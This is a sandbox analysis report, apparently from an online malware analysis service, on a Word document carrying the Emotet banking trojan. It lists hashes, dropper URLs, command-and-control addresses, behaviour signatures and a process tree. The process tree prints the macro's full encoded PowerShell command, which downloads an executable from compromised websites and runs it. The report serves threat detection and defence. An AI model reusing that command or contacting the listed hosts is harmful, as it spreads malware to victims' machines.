Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    29s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    29-07-2020 02:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a1782e6bdffc01f6df2967d1e263e6bd11bdb6fc1dd55b1530a981483fd7c9bf.doc

  • Size

    175KB

  • MD5

    5cd8e76bb4070769359874eb2c1e9b52

  • SHA1

    a02f310f5b5882c7b990d456a48875669c4c2cf4

  • SHA256

    a1782e6bdffc01f6df2967d1e263e6bd11bdb6fc1dd55b1530a981483fd7c9bf

  • SHA512

    d1df8a4b5e684447b379c0855249c7fc7ef62b2660a8a5a1042a47f55d33207f418762cdb5d1cab978716d03d842e14d2281bb81cafebdcbdf5d7f145510462c

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://fishbitedesign.com/delete_me/aq_no3_pixel079b/
exe.dropper

http://floridoweddings.com/wp-admin/1_fb_3rv7z6mr/
exe.dropper

http://floydswoodshop.com/floydswo/nn_g5_0s/
exe.dropper

http://fmcav.com/images/tihvt_5d_3znqq/
exe.dropper

http://goharm.com/wp-content/plugins/classic-editor/7b_k5_bo4lrnbmo6/

Extracted

Family

emotet

C2

76.27.179.47:80

212.51.142.238:8080

189.212.199.126:443

61.19.246.238:443

162.154.38.103:80

91.211.88.52:7080

83.110.223.58:443

124.45.106.173:443

116.203.32.252:8080

109.117.53.230:443

5.196.74.210:8080

75.139.38.211:80

168.235.67.138:7080

176.111.60.55:8080

169.239.182.217:8080

74.208.45.104:8080

31.31.77.83:443

222.214.218.37:4143

37.139.21.175:8080

91.205.215.66:443
rsa_pubkey.plain

Signatures

  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Drops file in System32 directory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a1782e6bdffc01f6df2967d1e263e6bd11bdb6fc1dd55b1530a981483fd7c9bf.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1068
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABBAE4ATABWAE4AaQBmAHoAPQAnAEoAQgBXAE4AUQBpAGUAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIAYABpAGAAVABZAFAAUgBPAHQAbwBjAG8ATAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEcATQBCAFcASQBtAGsAawAgAD0AIAAnADIAMgA3ACcAOwAkAFYAWABZAEUARgB3AHcAcQA9ACcASQBUAEUASwBVAHUAdgBsACcAOwAkAE0AUwBSAEsASgB1AGQAdgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARwBNAEIAVwBJAG0AawBrACsAJwAuAGUAeABlACcAOwAkAFEARgBKAEUASwBoAHQAdAA9ACcAVABXAFMAUwBFAGcAbABwACcAOwAkAFcAQgBWAE0ASABqAHAAeQA9AC4AKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAEUAYgBjAGwAaQBlAG4AdAA7ACQARgBHAFQASABBAGEAZABkAD0AJwBoAHQAdABwADoALwAvAGYAaQBzAGgAYgBpAHQAZQBkAGUAcwBpAGcAbgAuAGMAbwBtAC8AZABlAGwAZQB0AGUAXwBtAGUALwBhAHEAXwBuAG8AMwBfAHAAaQB4AGUAbAAwADcAOQBiAC8AKgBoAHQAdABwADoALwAvAGYAbABvAHIAaQBkAG8AdwBlAGQAZABpAG4AZwBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAxAF8AZgBiAF8AMwByAHYANwB6ADYAbQByAC8AKgBoAHQAdABwADoALwAvAGYAbABvAHkAZABzAHcAbwBvAGQAcwBoAG8AcAAuAGMAbwBtAC8AZgBsAG8AeQBkAHMAdwBvAC8AbgBuAF8AZwA1AF8AMABzAC8AKgBoAHQAdABwADoALwAvAGYAbQBjAGEAdgAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwB0AGkAaAB2AHQAXwA1AGQAXwAzAHoAbgBxAHEALwAqAGgAdAB0AHAAOgAvAC8AZwBvAGgAYQByAG0ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBwAGwAdQBnAGkAbgBzAC8AYwBsAGEAcwBzAGkAYwAtAGUAZABpAHQAbwByAC8ANwBiAF8AawA1AF8AYgBvADQAbAByAG4AYgBtAG8ANgAvACcALgAiAFMAcABsAGAASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQwBJAEcAWgBSAHIAcwBxAD0AJwBGAFIAQgBUAFUAeABrAG0AJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAQgBRAFUARgBpAHcAeQAgAGkAbgAgACQARgBHAFQASABBAGEAZABkACkAewB0AHIAeQB7ACQAVwBCAFYATQBIAGoAcAB5AC4AIgBkAE8AVwBOAEwAbwBhAGAAZABGAGAAaQBgAGwAZQAiACgAJABGAEIAUQBVAEYAaQB3AHkALAAgACQATQBTAFIASwBKAHUAZAB2ACkAOwAkAFAAUQBOAFIASwBtAG8AZAA9ACcAVQBQAE8AWABaAGYAZQB0ACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQATQBTAFIASwBKAHUAZAB2ACkALgAiAGwARQBgAE4ARwBUAEgAIgAgAC0AZwBlACAAMgAyADEAMAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAFIAYABlAGEAdABlACIAKAAkAE0AUwBSAEsASgB1AGQAdgApADsAJABRAE4AUwBMAFQAbgBvAGMAPQAnAEEAQwBWAEkAUwBnAHYAeQAnADsAYgByAGUAYQBrADsAJABMAFkAVQBMAE8AeAB5AGEAPQAnAEgAUwBXAE8AQQB1AHgAdgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABYAEYAVQBEAFYAagBoAGQAPQAnAFkASABXAFIARABnAGIAaQAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Drops file in System32 directory
    PID:1536
  • C:\Users\Admin\227.exe
    C:\Users\Admin\227.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1404
    • C:\Windows\SysWOW64\fundisc\mydocs.exe
      "C:\Windows\SysWOW64\fundisc\mydocs.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1644

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1068-2-0x0000000008960000-0x0000000008964000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1068-5-0x00000000024A0000-0x00000000024A4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1068-6-0x0000000002520000-0x0000000002524000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1068-9-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1404-12-0x00000000003A0000-0x00000000003AC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1644-15-0x00000000003E0000-0x00000000003EC000-memory.dmp

    Filesize

    48KB

    Download